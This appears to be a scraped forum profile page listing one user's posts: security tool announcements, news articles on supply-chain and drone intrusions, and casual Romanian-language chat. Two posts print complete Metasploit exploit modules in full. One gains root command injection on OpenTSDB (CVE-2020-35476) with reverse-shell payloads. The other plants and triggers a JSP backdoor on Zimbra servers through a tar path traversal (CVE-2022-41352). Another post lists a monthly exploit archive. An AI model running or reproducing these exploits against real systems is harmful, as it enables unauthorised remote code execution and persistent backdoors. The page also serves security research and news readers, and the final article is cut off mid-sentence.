-
Posts
1026 -
Joined
-
Days Won
55
Everything posted by Kev
-
modreveal modreveal is a small utility that prints the names of hidden LKMs if any exists. Usage make sudo ./modreveal Notes To test the utility, you can use the Diamorphine rootkit (https://github.com/m0nad/Diamorphine). The author runs Arch Linux LTS kernel, so it is only guaranteed to work on Arch Linux LTS kernel. It will most likely work with your kernel too unless you are running something ancient or really new that breaks something. Dowload: modreveal-master.zip or git clone https://github.com/jafarlihi/modreveal.git Source
-
This Metasploit module exploits an unauthenticated command injection vulnerability in the yrange parameter in OpenTSDB through 2.4.0 (CVE-2020-35476) in order to achieve unauthenticated remote code execution as the root user. The module first attempts to obtain the OpenTSDB version via the api. If the version is 2.4.0 or lower, the module performs additional checks to obtain the configured metrics and aggregators. It then randomly selects one metric and one aggregator and uses those to instruct the target server to plot a graph. As part of this request, the yrange parameter is set to the payload, which will then be executed by the target if the latter is vulnerable. This module has been successfully tested against OpenTSDB version 2.3.0. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'OpenTSDB 2.4.0 unauthenticated command injection', 'Description' => %q{ This module exploits an unauthenticated command injection vulnerability in the yrange parameter in OpenTSDB through 2.4.0 (CVE-2020-35476) in order to achieve unauthenticated remote code execution as the root user. The module first attempts to obtain the OpenTSDB version via the api. If the version is 2.4.0 or lower, the module performs additional checks to obtain the configured metrics and aggregators. It then randomly selects one metric and one aggregator and uses those to instruct the target server to plot a graph. As part of this request, the yrange parameter is set to the payload, which will then be executed by the target if the latter is vulnerable. This module has been successfully tested against OpenTSDB version 2.3.0. }, 'License' => MSF_LICENSE, 'Author' => [ 'Shai rod', # @nightrang3r - discovery and PoC 'Erik Wynter' # @wyntererik - Metasploit ], 'References' => [ ['CVE', '2020-35476'], ['URL', 'https://github.com/OpenTSDB/opentsdb/issues/2051'] # disclosure and PoC ], 'DefaultOptions' => { 'RPORT' => 4242 }, 'Platform' => %w[unix linux], 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], 'CmdStagerFlavor' => %w[bourne curl wget], 'Targets' => [ [ 'Automatic (Unix In-Memory)', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' }, 'Type' => :unix_memory } ], [ 'Automatic (Linux Dropper)', { 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], 'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }, 'Type' => :linux_dropper } ] ], 'Privileged' => true, 'DisclosureDate' => '2020-11-18', 'DefaultTarget' => 1, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION ] } ) ) register_options [ OptString.new('TARGETURI', [true, 'The base path to OpenTSDB', '/']), ] end def check # sanity check to see if the target is likely OpenTSDB res1 = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path) }) unless res1 return CheckCode::Unknown('Connection failed.') end unless res1.code == 200 && res1.get_html_document.xpath('//title').text.include?('OpenTSDB') return CheckCode::Safe('Target is not an OpenTSDB application.') end # get the version via the api res2 = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'api', 'version') }) unless res2 return CheckCode::Unknown('Connection failed.') end unless res2.code == 200 && res2.body.include?('version') return CheckCode::Detected('Target may be OpenTSDB but the version could not be determined.') end begin parsed_res_body = JSON.parse(res2.body) rescue JSON::ParserError return CheckCode::Detected('Could not determine the OpenTSDB version: the HTTP response body did not match the expected JSON format.') end unless parsed_res_body.is_a?(Hash) && parsed_res_body.key?('version') return CheckCode::Detected('Could not determine the OpenTSDB version: the HTTP response body did not match the expected JSON format.') end version = parsed_res_body['version'] begin if Rex::Version.new(version) <= Rex::Version.new('2.4.0') return CheckCode::Appears("The target is OpenTSDB version #{version}") else return CheckCode::Safe("The target is OpenTSDB version #{version}") end rescue ArgumentError => e return CheckCode::Unknown("Failed to obtain a valid OpenTSDB version: #{e}") end end def select_metric # check if any metrics have been configured. if not, exploitation cannot work res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'suggest'), 'vars_get' => { 'type' => 'metrics' } }) unless res fail_with(Failure::Unknown, 'Connection failed.') end unless res.code == 200 fail_with(Failure::UnexpectedReply, "Received unexpected status code #{res.code} when checking the configured metrics") end begin metrics = JSON.parse(res.body) rescue JSON::ParserError fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured metrics: The response body did not contain valid JSON.') end unless metrics.is_a?(Array) fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured metrics: The response body did not contain a JSON array') end if metrics.empty? fail_with(Failure::NoTarget, 'Failed to identify any configured metrics. This makes exploitation impossible') end # select a random metric since any will do @metric = metrics.sample print_status("Identified #{metrics.length} configured metrics. Using metric #{@metric}") end def select_aggregator # check the configured aggregators and select one at random res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'aggregators') }) unless res fail_with(Failure::Unknown, 'Connection failed.') end unless res.code == 200 fail_with(Failure::UnexpectedReply, "Received unexpected status code #{res.code} when checking the configured aggregators") end begin aggregators = JSON.parse(res.body) rescue JSON::ParserError fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured aggregators: The response body did not contain valid JSON.') end unless aggregators.is_a?(Array) fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured aggregators: The response body did not contain a JSON array') end if aggregators.empty? fail_with(Failure::NoTarget, 'Failed to identify any configured aggregators. This makes exploitation impossible') end # select a random aggregator since any will do @aggregator = aggregators.sample print_status("Identified #{aggregators.length} configured aggregators. Using aggregator #{@aggregator}") end def execute_command(cmd, _opts = {}) # use base64 to avoid special char escape hell (specifying BadChars did not help) cmd = "'echo #{Base64.strict_encode64(cmd)} | base64 -d | /bin/sh'" start_time = rand(20.year.ago..10.year.ago) # this should be a date far enough in the past to make sure we capture all possible data start_value = start_time.strftime('%Y/%m/%d-%H:%M:%S') end_time = rand(1.year.since..10.year.since) # this can be a date in the future to make sure we capture all possible data end_value = end_time.strftime('%Y/%m/%d-%H:%M:%S') get_vars = { 'start' => start_value, 'end' => end_value, 'm' => "#{@aggregator}:#{@metric}", 'yrange' => "[1:system(#{Rex::Text.uri_encode(cmd)})]", 'wxh' => "#{rand(800..1600)}x#{rand(400..600)}", 'style' => 'linespoint' } exploit_uri = '?' get_vars.each do |key, value| exploit_uri += "#{key}=#{value}&" end exploit_uri += 'json' # using a raw request because cgi was leading to encoding issues send_request_raw({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'q' + exploit_uri) }, 0) # we don't have to wait for a reply here end def exploit select_metric select_aggregator if target.arch.first == ARCH_CMD print_status('Executing the payload') execute_command(payload.encoded) else execute_cmdstager(background: true) end end end # 0day.today [2022-12-25] # Source
-
- 1
-
Subscriu la ce zice M4T3!: e.g: Nu te indexeaza: games0nline.ro jocurio#line.com Te pot ajuta, trimite-mi PM
-
Il gasesti pe github, Succes!
-
Iar daca specifica sursa?
-
150 free crash courses from the best instructors on YouTube. Click on a topic to begin! 🚀 Skills: Python JavaScript Java PHP Ruby C# C++ Git CS Basics HTML & CSS WordPress Excel SQL APIs Databases AWS Linux Communication Career Tracks: Front-End Dev. Back-End Dev. Mobile Dev. DevOps Data Engineer Data Analyst Data Scientist UX Designer Product Manager Digital Marketer Source: hourups.com
-
- 2
-
asta este exact cum sta treaba cu "gangsterii/traperii" vietii de vorbesc la telefon cu teanc-uri de $ cumparati de pe eBay, dar in realitate sunt vai mortii lor
-
A vulnerability discovered in GitHub Actions could allow an attacker to poison a developer's pipeline, highlighting the risk that insecure software pipelines pose. Source: SeventyFour Images via Alamy Stock Photo An attacker submitting changes to an open source repository on GitHub could cause downstream software projects that include the latest version of a component to compile updates with malicious code. That's according to software supply chain security firm Legit Security, which said in an advisory published on Dec. 1 that this "artifact poisoning" weakness could affect software projects that use GitHub Actions — a service for automating development pipelines — by triggering the build process when a change is detected in a software dependency. The vulnerability is not theoretical: Legit Security simulated an attack on the project that manages Rust, causing the project to recompile using a customized — and malicious — version of the popular GCC software library, the company stated in the advisory. The problem likely affects a large number of open source projects because maintainers typically will run tests on contributed code before they actually analyze the code themselves, says Liav Caspi, chief technology officer of Legit Security. "It is a common pattern today," he says. "A lot of open source projects today, upon a change request, they run a bunch of tests to validate the request because the maintainer does not want to have to review the code first. Instead, it automatically run tests." The attack takes advantage of the automated build process through GitHub Actions. In the case of the Rust programming language, the vulnerable pattern could have allowed an attacker to execute code in a privileged way as part of the development pipeline, stealing repository secrets and potentially tampering with code, Legit Security said. "To put it simply: in a vulnerable workflow, any GitHub user can create a fork that builds an artifact," the company stated in its advisory. "Then inject this artifact into the original repository build process and modify its output. This is another form of a software supply chain attack, where the build output is modified by an attacker." The vulnerability enables an attack similar to the malware-insertion attack that targeted CodeCov and, through that company's software, its downstream customers. "[T]he lack of native GitHub implementation for cross-workflow artifacts communication led many projects and the GitHub Actions community to develop insecure solutions for cross-workflow communication and made this threat highly prevalent," Legit Security stated in the advisory. GitHub confirmed the issue and paid a bounty for the information, while Rust fixed its vulnerable pipeline, Legit Security stated. Source: Legit Security Software Supply Chain Needs Security The vulnerability is the latest security issue to affect software supply chains. Industry and government agencies have increasingly sought to bolster the security of open source software and software provided as a service. In May 2021, for example, the Biden administration released its executive order on Improving the Nation's Cybersecurity, a federal rule that, among other requirements, mandates that the government will require baseline security standards for any software its purchases. On the private industry side, Google and Microsoft have pledged billions of dollars to shore up security in the open source ecosystem, which provides the code that comprises more than three-quarters of the average application's codebase. Logical, But Vulnerable The security issue belongs to a hard-to-find class of problems known as logic issues, which include issues with permissions, the potential for forked repositories to be inserted into a pipeline, and a lack of differentiation between forked and base repositories. Because software projects often use automated scripts to check code submissions before forwarded them to the maintainers, pull requests will be run through automation before any human checks them for malicious code. While the automation saves time, it also should be considered a way for attackers to insert malicious code into the pipeline. "When you are doing open source development, the problem is bigger, because you are accepting contribution from anyone in the world," Caspi says. "You are executing things that you cannot trust." GitHub acknowledged the issue and expanded the ways of excluding submissions from outside collaborators from being automatically inserted into the Actions pipeline. The company updated its GetArtifact and ListArtifacts APIs with the goal of providing more information to help determine whether an artifact can be trusted. "Anyone that does anything like the Rust project did — trusting the input from a third party — then they are still vulnerable," Caspi says. "It is a logic problem. GitHub just made it easier to write a safer script." Via darkreading.com
-
This archive contains all of the 69 exploits added to Packet Storm in November, 2022. Content: Directory of \2211-exploits 12/03/2022 05:06 PM <DIR> . 12/03/2022 05:06 PM <DIR> .. 11/02/2022 05:06 PM 9,286 apache_couchdb_erlang_rce.rb.txt 11/03/2022 02:29 PM 853 atg_client.py.txt 11/11/2022 03:21 PM 608 avevaiaasg2020R2-traversal.txt 11/21/2022 06:05 PM 2,412 boa09414-bypass.txt 11/21/2022 06:16 PM 9,623 churchinfo_upload_exec.rb.txt 11/15/2022 06:48 PM 7,019 ciscoseg-bypass.txt 11/21/2022 05:08 PM 2,003 clicshopping3402-xss.txt 11/29/2022 06:02 PM 11,611 concretecms913-xpath.txt 11/11/2022 03:16 PM 1,948 cvat20-ssrf.txt 11/21/2022 05:51 PM 72,940 CVE-2020-1493.tgz 11/21/2022 05:57 PM 64,952 CVE-2020-16947.tgz 11/30/2022 11:16 PM 348,622 CVE-2022-41412.tgz 11/30/2022 11:16 PM 687,025 CVE-2022-41413.tgz 11/24/2022 04:10 PM 4,299 ecommerce10-xssredirect.txt 11/30/2022 10:52 PM 8,957 exchange_proxynotshell_rce.rb.txt 11/24/2022 04:13 PM 5,064 f5_icontrol_rpmspec_rce_cve_2022_41800.rb.txt 11/02/2022 05:04 PM 4,135 flir_ax8_unauth_rce_cve_2022_37061.rb.txt 11/09/2022 03:16 PM 3,080 formaspotlms321-xss.txt 11/17/2022 03:31 PM 8,294 gitea_git_fetch_rce.rb.txt 11/04/2022 03:37 PM 50,046 GS20221104133541.txt 11/07/2022 05:15 PM 24,039 GS20221107151324.tgz 11/08/2022 03:54 PM 13,445 GS20221108135354.tgz 11/10/2022 03:35 PM 6,982 GS20221110133351.tgz 11/10/2022 03:41 PM 7,183 GS20221110133825.tgz 11/10/2022 03:46 PM 6,668 GS20221110134348.tgz 11/14/2022 06:50 PM 4,276 GS20221114164850.tgz 11/14/2022 06:52 PM 4,745 GS20221114165129.txt 11/14/2022 06:54 PM 4,696 GS20221114165410.tgz 11/18/2022 04:17 PM 111,390 GS20221118141708.tgz 11/18/2022 04:22 PM 11,505 GS20221118141944.tgz 11/25/2022 05:50 PM 4,259 GS20221125155014.tgz 11/25/2022 05:53 PM 3,717 GS20221125155355.tgz 11/25/2022 05:58 PM 5,768 GS20221125155537.tgz 11/30/2022 10:40 PM 5,509 hirschmannbatc2-exec.txt 11/25/2022 06:03 PM 2,041 hss10-sql.txt 11/16/2022 05:58 PM 2,847 idm641-execmitm.txt 11/11/2022 03:14 PM 1,250 iotransfer4-unquotedpath.txt 11/11/2022 03:23 PM 3,216 msnswitchmnt2408-exec.txt 11/10/2022 03:43 PM 5,772 MVID-2022-0653.txt 11/10/2022 03:37 PM 2,427 MVID-2022-0654.txt 11/14/2022 06:47 PM 2,056 MVID-2022-0655.txt 11/16/2022 06:02 PM 5,542 MVID-2022-0656.txt 11/21/2022 05:06 PM 2,953 MVID-2022-0657.txt 11/21/2022 05:19 PM 2,034 MVID-2022-0658.txt 11/23/2022 05:16 PM 4,808 MVID-2022-0659.txt 11/25/2022 06:11 PM 2,263 MVID-2022-0660.txt 11/25/2022 06:05 PM 3,811 MVID-2022-0661.txt 11/25/2022 06:09 PM 1,875 MVID-2022-0662.txt 11/11/2022 03:13 PM 8,631 owa173-exec.txt 11/30/2022 10:44 PM 10,167 OXUIB-1654.txt 11/16/2022 06:13 PM 1,863 rcs10-sqlexec.py.txt 11/16/2022 06:17 PM 1,969 rcs10-xssbypass.txt 11/21/2022 06:10 PM 3,700 roxy-fileman_upload.py.txt 11/15/2022 06:51 PM 14,981 SA-20221109-0.txt 11/15/2022 06:55 PM 8,873 SA-20221110-0.txt 11/15/2022 06:57 PM 8,165 SA-20221114-0.txt 11/04/2022 03:34 PM 1,621 slms950-sql.txt 11/11/2022 03:18 PM 1,462 smartrgsr510n2613-exec.txt 11/25/2022 06:02 PM 1,724 smsphp10-sql.txt 11/28/2022 05:49 PM 4,299 vbulletin552-exec.txt 11/15/2022 06:42 PM 5,627 vmware_nsxmgr_xstream_rce_cve_2021_39144.rb.txt 11/02/2022 05:02 PM 5,382 webmin_file_manager_rce.rb.txt 11/15/2022 06:50 PM 3,306 wpbecustom1052-xsrf.txt 11/21/2022 05:24 PM 4,907 wpbetheme26514-deserialize.txt 11/09/2022 03:42 PM 7,879 wpblog2social6911-bypass.txt 11/21/2022 05:31 PM 1,101 zteh108ns-bypass.txt 11/21/2022 05:11 PM 1,563 zteh108ns-overflow.txt 67 File(s) 1,657,074 bytes 2 Dir(s) 2,291,347,456 bytes free Download: 202211-exploits.tgz (1.4 MB) Source
-
Listen to college radio stations FAQ I don’t see my college radio station. Can you add it? Absolutely! It’s pretty easy for me to add new stations, and I’m always looking for new radio stations to listen to. Feel free to suggest stations via this form! What does it mean if a station is grayed out? If a station card is gray, that means the app is still loading its corresponding audio stream. It should be ready to play soon! Why do the stations periodically turn gray? In order to smoothly switch between streams, Campus FM keeps a small cache of audio data available for each station. After some time has passed, the cached audio gets stale and the app requests more recent content. The station is grayed out during this loading period. I've been waiting for a while now, why isn't my station loading? IT practices aren't consistent across all college radio stations. Sometimes they have security restrictions that prevent their audio streams from loading on certain apps and devices. And sometimes the audio streams just go offline for a while. The app isn’t working on my device / I’ve spotted a bug / I’d like to see [insert feature here]. That’s awesome (or I’m sorry)! I’m still learning how to build web apps and I would love your feedback! If you have a Github account, you can open an issue directly on the Campus FM repo, or you can get in touch with me at hello.campusfm@gmail.com Can I get Campus FM on my phone/tablet? I’m working on native apps for iOS and Android! URL: https://www.campus-fm.com Source: github.com
-
Feep! search (alpha) About Feep! search is a web search engine, focused on programming resources. It uses an independent index, currently totalling a bit over 29 million pages. (That’s slightly more than Google’s first index in 1998!) Result quality is rather variable, mainly because I haven’t tuned the ranking very well yet. See about Feep! search for more information. URL: https://search.feep.dev Source: github.com
-
Nu mi-e lene, majoritatea au PUA/Generic etc... 7/36 in virustotal Edit: nu inteleg cum trimite SMS de confirmare din moment ce nu are SIM, nici WiFi, iar programele mentionate ^ nu rezolva nimic, am reusit sa intru in el prin Smart Switch
-
@mannnu in primul video indianul cere 2k, 3k, mai mult decat telefonul, il folosesc pentru uz personal al II-lea video nu ma intereseaza, il vreau ca din fabrica, daca nu il predau. Multumesc oricum
-
Salut Am primit cadou un telefon de la o bătrânică, Samsung Grand Prime (nu stiu modelul) nu pot accesa meniul, am incercat cu Hard Reset, nimic, am incercat cu software-uri insa toate au PUA/Generic etc... Cum il poate aduce in starea din fabribricatie? Doarme cand o sun sa-mi trimita G-xxx, am incercat ore Edit/ Model: Samsung sm-g531f Edit// Am incercat si cu Odin, nu gasesc Firmware, baba nu stie password-ul de la e-mail, incerc sa-i dau un Flash Multumesc
-
Simple C++ Encryption and Steganography tool that uses Password-Protected-Encryption to secure a file's contents, and then proceeds to embed it insde an image's pixel-data using Least-Significant-Bit encoding. For Linux based systems. Encoding: $ ./steganography encode -i data/orig.png -e data/jekyll_and_hyde.zip -o output.png Password: 1234 * Image size: 640x426 pixels * Encoding level: Low (Default) * Max embed size: 132.38 KiB * Embed size: 61.77 KiB * Encrypted embed size: 61.78 KiB * Generated CRC32 checksum * Generated encryption key with PBKDF2-HMAC-SHA-256 (20000 rounds) * Encrypted embed with AES-256-CBC * Embedded jekyll_and_hyde.zip into image * Sucessfully wrote to output.png Original image: Image with embedded ZIP containg the entire contents of the book "Dr Jekyll and Mr Hyde": Decoding: $ ./steganography decode -i output.png -o "out - jekyll_and_hyde.zip" Password: 1234 * Image size: 640x426 pixels * Generated decryption key with PBKDF2-HMAC-SHA-256 (20000 rounds) * Sucessfully decrypted header * File signatures match * Detected embed jekyll_and_hyde.zip * Encoding level: Low (Default) * Encrypted embed size: 61.78 KiB * Successfully decrypted the embed * Decrypted embed size: 61.77 KiB * CRC32 checksum matches * Successfully wrote to out - jekyll_and_hyde.zip Building: $ mkdir build $ cd build $ cmake -DCMAKE_BUILD_TYPE=Release .. $ make -j 4 Usage: Usage: steganography [-h] {decode,encode} Optional arguments: -h, --help shows help message and exits -v, --version prints version information and exits Subcommands: decode Decodes and extracts an embed-file from an image encode Encodes an embed-file into an image Encoding: Usage: encode [-h] --input VAR --output VAR --embed VAR [--passwd VAR] Encodes an embed-file into an image Optional arguments: -h, --help shows help message and exits -v, --version prints version information and exits -i, --input specify the input image. [required] -o, --output specify the output image. [required] -e, --embed specify the file to embed. [required] -p, --passwd specify the encryption password. Decoding: Usage: decode [-h] --input VAR [--output VAR] [--passwd VAR] Decodes and extracts an embed-file from an image Optional arguments: -h, --help shows help message and exits -v, --version prints version information and exits -i, --input specify the input image. [required] -o, --output specify the output file. [default: ""] -p, --passwd specify the encryption password. Theory Of Operation Encoding The program operates by first randomly generating a 128-bit Password Salt and a 128-bit AES Initialization Vector by reading binary data from /dev/urandom. It then uses that Password Salt as a parameter in generating an encryption key, by using PBKDF2-HMAC-SHA-256 on a user inputted string. A CRC32 hash of the file to embed is then calculated, and stored in the header to act as a checksum for the validity of the data. It then pads the binary data of the file to embed using the PKCS #7 algorithm, followed by actually encrypting both the header and the padded data, with AES-256 in CBC Mode, using the previously generated Initialization Vector. Now the data is actually encoded inside the image by first picking a random offset, and then going through each bit of data and storing it inside the actual image pixel data, which it accomplishes by setting the Least-Significant-Bit of each channel byte of each pixel. Decoding The decoding process works exactly the same as the encoding process previously described above, just in reverse. The only difference is that for decoding, after the program attempts to extract and decrypt the data, it compares some of the information in the header section in an attempt to validate the extraction process. The header fields which are compared are: The 4 byte file signature custom to this program, and the CRC32 hash of the decrypted data. If any of these fields do not match to their correct values, the decryption process will fail. This should only happen if the file which you were attempting to decrypt does not actually contain an embed, if the password you entered is wrong, or if the image file was somehow corrupted. Detection While the detection of data being embedded in an image is a trivial task, theoretically there is no way of knowing that it was this program that did it, and theoretically there should be no known way to decrypt the data without knowing the password, that is without spending millions of years in the process of doing so. Disclaimer Do not use this program to encrypt and hide important data which you wish to keep away from prying eyes. This is just a simple proof-of-concept program that I made for fun. I'm no cryptographer. I'm just a hobbyist, use at your own risk. Copyright This software is licensed under MIT. Copyright © 2022 Zach Collins Download: steganography-main.zip or git clone https://github.com/7thSamurai/steganography.git Source
- 1 reply
-
- 3
-
Project two years in the making aims to improve public services... or what's left of them It's pork barrel time again. The UK government has named a slew of tech organizations that made it onto a £2 billion framework agreement that allows them to compete for big data and analytics public sector contracts. The Cabinet Office-run Crown Commercial Service (CCS), which sets up procurement on behalf of government ministries and other public sector organizations, ran the process and awarded contracts to many of the usual suspects and some lesser known entities (see box). According to the contract award notice, the government sees big data and analytics as an emerging and evolving capability, "with its prominence heightened by COVID." It claims the technology is "fast becoming recognised as business critical and a core business function, with many government departments now including chief data officers." The notice says the procurement is required in part to support the National Data Strategy, a set of proposals for post-Brexit legislation which include changes to the remit of the Information Commissioners Office, the data privacy watchdog. The procurement notice said the contracted suppliers, which are set to vie for business on framework, could help with the implementation of the government's "missions to reinforce the requirement to access and interrogate Government data more effectively to improve public services." The government has taken more than a year to select the winning suppliers. It first announced plans to create the framework deal — a means of offering suppliers an indicative spending figure in exchange for structured pricing and preparedness for the work — in September last year, with a contract notice launching the competition following in November. The framework is divided into two lots. The first looks for suppliers to design, build, and run professional services; the second is for commercial off-the-shelf software. Launched in December 2020 by minister Oliver Dowden, the National Data Strategy talks of a "pro-growth and trusted data regime" that can transform the government's use of data and drive efficiency and so on. "Data is a non-depletable resource in theory, but its use is limited by barriers to its access – such as when data is hoarded, when access rights are unclear or when organisations do not make good use of the data they already have. These barriers undermine the performance of public services and our economy, risking poorer outcomes for citizens. We will ensure that data can be leveraged to deliver new and innovative services, promote stronger competition, and better prices and choice for consumers and small businesses," promised Dowden at the launch of the consultation. ® Via theregister.com
-
Joaca-te pe la def.camp, sunt o multitudine de challeges aici
-
This Metasploit module creates a .tar file that can be emailed to a Zimbra server to exploit CVE-2022-41352. If successful, it plants a JSP-based backdoor in the public web directory, then executes that backdoor. The core vulnerability is a path-traversal issue in the cpio command-line utility that can extract an arbitrary file to an arbitrary location on a Linux system (CVE-2015-1197). Most Linux distros have chosen not to fix it. This issue is exploitable on Red Hat-based systems (and other hosts without pax installed) running versions Zimbra Collaboration Suite 9.0.0 Patch 26 and below and Zimbra Collaboration Suite 8.8.15 Patch 33 and below. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::EXE include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info = {}) super( update_info( info, 'Name' => 'TAR Path Traversal in Zimbra (CVE-2022-41352)', 'Description' => %q{ This module creates a .tar file that can be emailed to a Zimbra server to exploit CVE-2022-41352. If successful, it plants a JSP-based backdoor in the public web directory, then executes that backdoor. The core vulnerability is a path-traversal issue in the cpio command- line utlity that can extract an arbitrary file to an arbitrary location on a Linux system (CVE-2015-1197). Most Linux distros have chosen not to fix it. This issue is exploitable on Red Hat-based systems (and other hosts without pax installed) running versions: * Zimbra Collaboration Suite 9.0.0 Patch 26 (and earlier) * Zimbra Collaboration Suite 8.8.15 Patch 33 (and earlier) The patch simply makes "pax" a pre-requisite. }, 'Author' => [ 'Alexander Cherepanov', # PoC (in 2015) 'yeak', # Initial report 'Ron Bowes', # Analysis, PoC, and module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2022-41352'], ['URL', 'https://forums.zimbra.org/viewtopic.php?t=71153&p=306532'], ['URL', 'https://blog.zimbra.com/2022/09/security-update-make-sure-to-install-pax-spax/'], ['URL', 'https://www.openwall.com/lists/oss-security/2015/01/18/7'], ['URL', 'https://lists.gnu.org/archive/html/bug-cpio/2015-01/msg00000.html'], ['URL', 'https://attackerkb.com/topics/1DDTvUNFzH/cve-2022-41352/rapid7-analysis'], ['URL', 'https://attackerkb.com/topics/FdLYrGfAeg/cve-2015-1197/rapid7-analysis'], ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P27'], ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P34'], ], 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], 'Targets' => [ [ 'Zimbra Collaboration Suite', {} ] ], 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp', 'TARGET_PATH' => '/opt/zimbra/jetty_base/webapps/zimbra/', 'TARGET_FILENAME' => nil, 'DisablePayloadHandler' => false, 'RPORT' => 443, 'SSL' => true }, 'Stance' => Msf::Exploit::Stance::Passive, 'DefaultTarget' => 0, 'Privileged' => false, 'DisclosureDate' => '2022-06-28', 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS] } ) ) register_options( [ OptString.new('FILENAME', [ false, 'The file name.', 'payload.tar']), # Separating the path, filename, and extension allows us to randomize the filename OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (an absolute path - eg, /opt/zimbra/...).']), OptString.new('TARGET_FILENAME', [ false, 'The filename to write in the target directory; should have a .jsp extension (default: public/<random>.jsp).']), ] ) register_advanced_options( [ OptString.new('SYMLINK_FILENAME', [ false, 'The name of the symlink file to use (default: random)']), OptBool.new('TRIGGER_PAYLOAD', [ false, 'If set, attempt to trigger the payload via an HTTP request.', true ]), # Took this from multi/handler OptInt.new('ListenerTimeout', [ false, 'The maximum number of seconds to wait for new sessions.', 0 ]), OptInt.new('CheckInterval', [ true, 'The number of seconds to wait between each attempt to trigger the payload on the server.', 5 ]) ] ) end def exploit print_status('Encoding the payload as .jsp') payload = Msf::Util::EXE.to_jsp(generate_payload_exe) # Small sanity-check if datastore['TARGET_FILENAME'] && !datastore['TARGET_FILENAME'].end_with?('.jsp') print_warning('TARGET_FILENAME does not end with .jsp, was that intentional?') end # Generate a filename if needed target_filename = datastore['TARGET_FILENAME'] || "public/#{Rex::Text.rand_text_alpha_lower(4..10)}.jsp" symlink_filename = datastore['SYMLINK_FILENAME'] || Rex::Text.rand_text_alpha_lower(4..10) # Sanity check - the file shouldn't exist, but we should be able to do requests to the server if datastore['TRIGGER_PAYLOAD'] print_status('Checking the HTTP connection to the target') res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_filename) ) unless res fail_with(Failure::Unknown, 'Could not connect to the server via HTTP (disable TRIGGER_PAYLOAD if you plan to trigger it manually)') end # Break when the file successfully appears unless res.code == 404 fail_with(Failure::Unknown, "Server returned an unexpected result when we attempted to trigger our payload (expected HTTP/404, got HTTP/#{res.code}") end end # Create the file begin contents = StringIO.new Rex::Tar::Writer.new(contents) do |t| print_status("Adding symlink to path to .tar file: #{datastore['TARGET_PATH']}") t.add_symlink(symlink_filename, datastore['TARGET_PATH'], 0o755) print_status("Adding target file to the archive: #{target_filename}") t.add_file(File.join(symlink_filename, target_filename), 0o644) do |f| f.write(payload) end end contents.seek(0) tar = contents.read contents.close rescue StandardError => e fail_with(Failure::BadConfig, "Failed to encode .tar file: #{e}") end file_create(tar) print_good('File created! Email the file above to any user on the target Zimbra server') # Bail if they don't want the payload triggered return unless datastore['TRIGGER_PAYLOAD'] register_file_for_cleanup(File.join(datastore['TARGET_PATH'], target_filename)) interval = datastore['CheckInterval'].to_i print_status("Trying to trigger the backdoor @ #{target_filename} every #{interval}s [backgrounding]...") # This loop is mostly from `multi/handler` stime = Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i timeout = datastore['ListenerTimeout'].to_i loop do break if session_created? break if timeout > 0 && (stime + timeout < Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i) res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_filename) ) unless res fail_with(Failure::Unknown, 'Could not connect to the server to trigger the payload') end # Break when the file successfully appears if res.code == 200 print_good('Successfully triggered the payload') # This should break when we get to session_created? end Rex::ThreadSafe.sleep(interval) end end end # 0day.today [2022-10-21] # Source: 0day.today
-
- 1
-
eu cred ca vrei sa-ti bati nevasta si nu ai motive, BDSM< Liveleak, etc... invata in timp si de 314zda, ... oaza s.a.m.d. sunt legit app-uri pentru Android, iOS etc... platesti, ii cenzurezi aplicatiile mentionate mai sus copilului si poti dormi linistit.
-
Check your rooftops: Flying gear caught carrying network-intrusion kit Modified off-the-shelf drones have been found carrying wireless network-intrusion kit in a very unlikely place. The idea of using consumer-oriented drones for hacking has been explored over the past decade at security conferences like Black Hat 2016, in both the US and in Europe. Naomi Wu, a DIY tech enthusiast, demonstrated a related project called Screaming Fist in 2017. And in 2013, security researcher Samy Kamkar demonstrated his SkyJack drone, which used a Raspberry Pi to take over other drones via Wi-Fi. Now these sort of attacks are actually taking place. Greg Linares, a security researcher, recently recounted an incident that he said occurred over the summer at a US East Coast financial firm focused on private investment. He told The Register that he was not involved directly with the investigation but interacted with those involved as part of his work in the finance sector. The Register corresponded with an individual affiliated with the affected company who corroborated Linares's account and asked not to be identified owing to a non-disclosure agreement and employment concerns. In a Twitter thread, Linares said the hacking incident was discovered when the financial 